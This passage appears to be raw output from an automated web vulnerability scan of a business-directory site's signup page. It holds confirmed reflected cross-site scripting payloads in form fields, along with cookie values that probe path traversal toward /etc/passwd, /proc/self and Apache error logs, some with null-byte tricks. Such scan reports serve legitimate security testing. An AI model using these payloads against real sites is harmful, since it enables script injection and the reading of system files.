OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 271
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

refererUrl='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001330)%3c%2fscript%3e&pseudonym=3&emailAddress=netsparker%40example.com&firstName=Smith&lastName=Smith&companyName=Smith&password1=3&password2=3&termsOfService=1&receiveSpecialOfferEmail=1&x=0&y=0

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:41:46 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=0C3F09D7389E625F519BE2753FCF2C0C; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="InsideUp, business, wiki, advertise, business category, vendors, ratings, business service, technology, leads, community, social networking, referral, reference, share, San Diego, commerce, b2b, trade, industry, selling, production, big business, dealing, corporation, conglomerate, establishment, partnership, firm, multinational, transnational, small business, enterprise, venture, organization, transaction, contract, commercial, occupational, corporate, publicize, market, search, forum, forums, discuss, share, information"/> <meta name="description" content="Join your community and share your services!"/> <meta name="robots" content="index; follow"/> <title>Share your services and experiences with your community.</title> <link rel="stylesheet" type="text/css" href="/css/mainNewInsideup.css" />
<link rel="stylesheet" type="text/css" href="/css/calendar.css" /> <script type="text/javascript" src="/js/jquery-1.2.1.js"></script> <script type="text/javascript" src="/js/ajax.js"></script> <script type="text/javascript" src="/js/ajax-dynamic-list.js"></script> <script type="text/javascript" src="/js/default.js"></script> <script type="text/javascript" src="/js/calendar.js" ></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {} </script></head><body> <div id="mainContainer">
<!--Header Start's Here--> <div class="header"> <!---put header section here--> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> 
<option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." 
>Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value="'"--></style></script><script>netsparker(0x001330)</script>"> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" 
src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('Community Signup',0,'')" alt="Home" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerHomeActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerHomeActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <!--Header End's Here--> <!--Mid Container Start's Here--> <div id="midSectionBox"> <!--midsection part starts--> <script type="text/javascript"> function invertValue(y){ var x=document.getElementById(y).value if(x==0) { document.getElementById(y).value=1 } if(x==1) { 
document.getElementById(y).value=0 }}</script><div style="background:url(/images/midSliceMain.gif);"> <div style="width:850px; height:740px; margin:auto; padding-top:20px;"> <!-----left Section--------> <div style="width:530px; height:auto; float:left;"> <div id="communityLogin"> <div style="width:492px; height:84px; border:1px solid #eeeeee;"> <form method="post" id="communityLoginId"> <input type="hidden" name="refererUrl" value="'"--></style></script><script>netsparker(0x001330)</script>"> <table width="96%" border="0" align="right" cellpadding="0" cellspacing="0"> <tr> <td width="27%" height="70" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777;">Already A Member?</td> <td width="53%" valign="bottom" style="font:bold 12px Arial, Helvetica, sans-serif; color:#777777; padding-top:22px;">&nbsp; <input name="username" value="username" type="text" onclick="clearInput(this);" onfocus="clearInput(this);" id="textfield" style="width:110px; padding:3px 0 0 3px; height:20px; border:1px solid #cccccc; margin-left:5px;" onkeypress="checkEnterKey(event)" /> <input type="password" name="password" id="textfield" style="width:110px; height:22px; border:1px solid #cccccc; padding:3px 0 0 3px; height:20px; margin-left:5px;" value="password" onclick="clearInput(this);" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" /> <span style="padding-left: 10px; line-height: 12px;"> <input type="hidden" name="_rememberme"> <input type="checkbox" name="rememberme" id="checkbox" value="true" /> <span style="color:#777777;font-size:10px;font-weight:bold;text-decoration:none;">Remember Me</span> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </span> </td> <td width="22%" style="padding-top:6px;">&nbsp; <a href="javascript:void(0);" onclick="javascript:submitCommunityLogin();checkScreenWidth();"><img src="images/ComunityLogin.png" border="0" alt="Login"/></a> </td> </tr> </table> </form> </div> </div> 
<form method="post" action="communitysignup.html"> <input type="hidden" name="refererUrl" value='&#039;&#034;--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x001330)&lt;/script&gt;'/> <div> <table width="496" border="0" cellspacing="0" cellpadding="0" style="margin-top:20px;"> <tr> <td colspan="2" style="font:bold 22px Arial, Helvetica, sans-serif; color:#181818;">Create Your Free Account</td> </tr> <tr> <td height="24" colspan="2" style="font:normal 12px Arial, Helvetica, sans-serif; color:#181818;">To gain free access to the InsideUp community please complete this short registration.</td> </tr> <tr> <td width="131" height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Username <span style="color:#dc0000">*</span></td> <td width="365"> <input type="text" name="pseudonym" value="3" id="pseudonym" style="width:280px; height:18px; padding-top:3px; margin-left:10px;" class="inputbox123 " /> </td> </tr> <tr> <td height="50" align="right" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121">Email <span style="color:#dc0000">*</span></td> <..
- /communitysignup.html

/communitysignup.html CONFIRMED

http://www.insideup.com/communitysignup.html

Parameters

Parameter Type Value
refererUrl POST http://www.insideup.com/index.html
pseudonym POST 3
emailAddress POST netsparker@example.com
firstName POST '"--></style></script><script>alert(0x001336)</script>
lastName POST Smith
companyName POST Smith
password1 POST 3
password2 POST 3

Request

POST /communitysignup.html HTTP/1.1
Referer: http://www.insideup.com/communitysignup.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[../../../../../../../../../../proc/self/fd/2\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 256
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

refererUrl=http%3a%2f%2fwww.insideup.com%2findex.html&pseudonym=3&emailAddress=netsparker%40example.com&firstName='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001336)%3c%2fscript%3e&lastName=Smith&companyName=Smith&password1=3&password2=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:41:50 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=8DAFA76EF032331FD1EAE906BCD17BCD; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="InsideUp, business, wiki, advertise, business category, vendors, ratings, business service, technology, leads, community, social networking, referral, reference, share, San Diego, commerce, b2b, trade, industry, selling, production, big business, dealing, corporation, conglomerate, establishment, partnership, firm, multinational, transnational, small business, enterprise, venture, organization, transaction, contract, commercial, occupational, corporate, publicize, market, search, forum, forums, discuss, share, information"/> <meta name="description" content="Join your community and share your services!"/> <meta name="robots" content="index; follow"/> <title>Share your services and experiences with your community.</title> <link rel="stylesheet" type="text/css" href="/css/mainNewInsideup.css" />
<link rel="stylesheet" type="text/css" href="/css/calendar.css" /> <script type="text/javascript" src="/js/jquery-1.2.1.js"></script> <script type="text/javascript" src="/js/ajax.js"></script> <script type="text/javascript" src="/js/ajax-dynamic-list.js"></script> <script type="text/javascript" src="/js/default.js"></script> <script type="text/javascript" src="/js/calendar.js" ></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {} </script></head><body> <div id="mainContainer">
<!--Header Start's Here--> <div class="header"> <!---put header section here--> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> 
<option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" 